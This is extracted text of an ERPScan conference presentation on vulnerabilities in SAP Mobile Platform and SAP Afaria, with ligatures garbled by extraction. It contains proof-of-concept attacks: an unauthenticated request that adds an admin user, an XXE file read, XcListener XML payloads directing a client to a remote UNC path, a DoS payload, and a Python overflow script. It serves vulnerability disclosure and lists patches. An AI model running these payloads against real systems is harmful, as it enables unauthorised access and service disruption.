Upload
erpscan
View
63
Download
4
Tags:
Embed Size (px)
Citation preview
About ERPScan
• The only 360-‐degree SAP Security solu=on -‐ ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP ( 150+ ) • 60+ presentaCons key security conferences worldwide • 25 Awards and nominaCons • Research team -‐ 20 experts with experience in different areas
of security • Headquarters in Palo Alto (US) and Amsterdam (EU)
2
SMP protocols
SUP 2.1.3 SUP 2.2 SMP 2.3 SMP 3.0
SMP Messaging x x x x SMP ReplicaCon x x x x HTTP Rest API x x x SAP Agentry x x
7
SAP Control Center (Portal)
• Working process: sccservice.exe • Open ports:
– 2100 (Messaging service) – 8282/8283 (Portal) – 9999 (RMI)
9
SAP Mobile Server services
• MobiLink • AdminWebServices
• MlsrvWrapper • InfoboxMul=plexer
• OBMO • JMSBridge
13
DecrypCng the SAP Mobile PlaMorm GIOP protocol
• GIOP – General Inter-‐ORB Protocol (GIOP) is the abstract protocol by which object request brokers (ORBs) communicate
• Uses mlsrv16.exe (Mobilink) – port 2000
18
XXE in the SAP Mobile Platform portal page…
• Portal URL: h8ps://IP_ADDR:8283/scc • web.xml & services-‐config.xml
C:\SAP\SCC-‐3_2\services\EmbeddedWebContainer\container\Je8y-‐7.6.2.v20120308\work\je8y-‐0.0.0.0-‐8282-‐scc.war-‐_scc-‐any-‐\webapp\WEB-‐INF\web.xml
<servlet-mapping>
<servlet-name>MessageBrokerServlet</servlet-name>
<url-pattern>/messagebroker/*</url-pattern>
</servlet-mapping>
20
…XXE…
C:\SAP\SCC-‐3_2\services\EmbeddedWebContainer\container\Je8y-‐7.6.2.v20120308\work\je8y-‐0.0.0.0-‐8282-‐scc.war-‐_scc-‐any-‐\webapp\WEB-‐INF\flex\services-‐config.xml
********************************
<channel-definition id="scc-http"
class="mx.messaging.channels.HTTPChannel">
<endpoint url="http://{server.name}:{server.port}/scc/messagebroker/http"
class="flex.messaging.endpoints.HTTPEndpoint" />
</channel-definition>
********************************
1. /scc/messagebroker/amfpolling
2. /scc/messagebroker/amfsecurepolling
3. /scc/messagebroker/h"p
4. /scc/messagebroker/h"psecure
5. /scc/messagebroker/amflongpolling
21
Read file with XXE
C:\SAP\MobilePla,orm\Servers\UnwiredServer\Repository\Instance\com\sybase\sup\server\SUPServer\sup.proper6es
sup.imo.upa = 457ba103a46559486a81350d552a9e47fb085927eb6df0ccc79231bc3d
23
SAP Mobile PlaMorm unauthenCcated access to other servlets
• Architecture and program vulnerabili6es in SAP’s J2EE engine
(BlackHat USA 2011)
• web.xml files revealed hidden methods to:
– Read and generate logs
– Deploy and install JAR packages
26
AdminWebService
POST /MobileOffice/Admin.asmx/AddAdminUser HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: length strUserName=Admin2&strActivationCode=123QWEasd&iExpirationHours=100
27
SAP SQL Anywhere BoF/Code ExecuCon
• CVE-‐2008-‐0912 – The MobiLink server is affected by a heap overflow which happens
during the handling of strings like username, version, and remote ID (all
pre-‐auth) which are longer than 128 bytes
• CVE-‐2014-‐9264 – Stack-‐based buffer overflow in the .NET Data Provider in SAP SQL
Anywhere allows remote a"ackers to execute arbitrary code via a
craked column alias
28
SAP EMR Unwired SQL injecCon
• CVE-‐2013-‐7096 (CVSS 7.5) • AndroidManifest.xml: <provider
android:name=".providers.ModiDataDbProvider"
android:authorities="com.sap.mobi.docsprovider" />
1. content://com.sap.mobi.docsprovider/documents/offline_cat
2. content://com.sap.mobi.docsprovider/documents/offline/
3. content://com.sap.mobi.docsprovider/documents/sample
4. content://com.sap.mobi.docsprovider/documents/online
5. content://com.sap.mobi.docsprovider/documents/offline_auth
6. content://com.sap.mobi.docsprovider/documents/offline
7. content://com.sap.mobi.docsprovider/documents/online_auth
8. content://com.sap.mobi.docsprovider/documents/sample/
9. content://com.sap.mobi.docsprovider/documents/online_cat
33
SAP Afaria
• MDM Solu=on – Version 7.0 SP5: Released August 2014 ( as SAP Afaria SP5) – Version 7.0 SP4: Released December 2013 (as SAP Afaria SP4) – Version 7.0 SP2: Released December 2012 (as SAP Afaria SP2) – Version 7.0: Released April 2012 (as SAP Afaria) – Version 6.6: Released September 2010 – Version 6.5: Released November 2009 – Version 6.0: Released December 2008 – Version 5.0: Released November 2003 – Version 4.0: Released June 2000 (as Afaria) – Version 3.5: Released May 2000 (as Afaria for Handhelds) – Version 3.0: Released October 1999 – Version 2.0: Released February 1999 (as CONNECT:Manage) – Version 1.2: Released October 1997 (as RemoteWare Express) – Version 1.0: Released February 1997 (as SessionXpress)
36
How it works
• Provide and enroll devices in management
• Define device sepngs
• Secure devices and data
• Collect inventory
• Distribute sokware
• Collect device ac=vity data
for managing expenses
37
Missing authorizaCon
• Command value Run Channel or Test • The XML request must start with 4 spaces • PoC: <AfariaNotify version="1.0.0"> <Message type="Command" value="Run Channel"> <Client name="AFARIA70PT"> <Client name="LOCALHOST"
GUID="59146189-1f92-46d5-85aa-6293631d5d2e"> <Transmitter address="172.16.2.67:4444\asd"> <Channel address="\\172.16.2.67:4444\asd" name="\
\172.16.2.67:4444\df"></Channel> </Transmitter> </Client> </Message> </AfariaNotify>
48
PrevenCon
Install SAP security note 2134905 Missing authoriza=on check in XCListener
49
• Install SAP security note 1864518 • Security Improvements for MOB-‐APP-‐EMR-‐AND
XcListener DoS
<AfariaNotify version="1.0.0">
<Message type="Command" value="Run Channel" > <Client name="LOCALHOST" >
<Client name="LOCALHOST" GUID="59146189-1f92-46d5-85aa-6293631d5d2e">
<Transmitter address="172.16.2.67:4444\">
<Channel address="\\172.16.2.67:4444\asd" name="\\172.16.2.67:4444\(A*1491)">
</Channel> </Transmitter>
</Client>
</Message>
</AfariaNotify>(A*3678)
50
XcListener BoF
• PoC: import socket HOST = ‘hostname' PORT = 3005 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) poc = 'A'*4098 s.send(poc) data = s.recv(10000) s.close() print 'Received', (data)
51
Each SAP landscape is unique and we pay close a8en6on to the requirements of our customers and prospects. ERPScan development team constantly addresses these specific needs and is ac6vely involved in product advancement. If you wish to know whether our scanner addresses a par6cular aspect, or simply have a feature wish list, please e-‐mail us. We will be glad to consider your sugges6ons for the future releases or monthly updates.
53
About
228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
USA HQ
Luna ArenA 238 Herikerbergweg, 1101 CM Amsterdam
EU HQ
www.erpscan.com [email protected]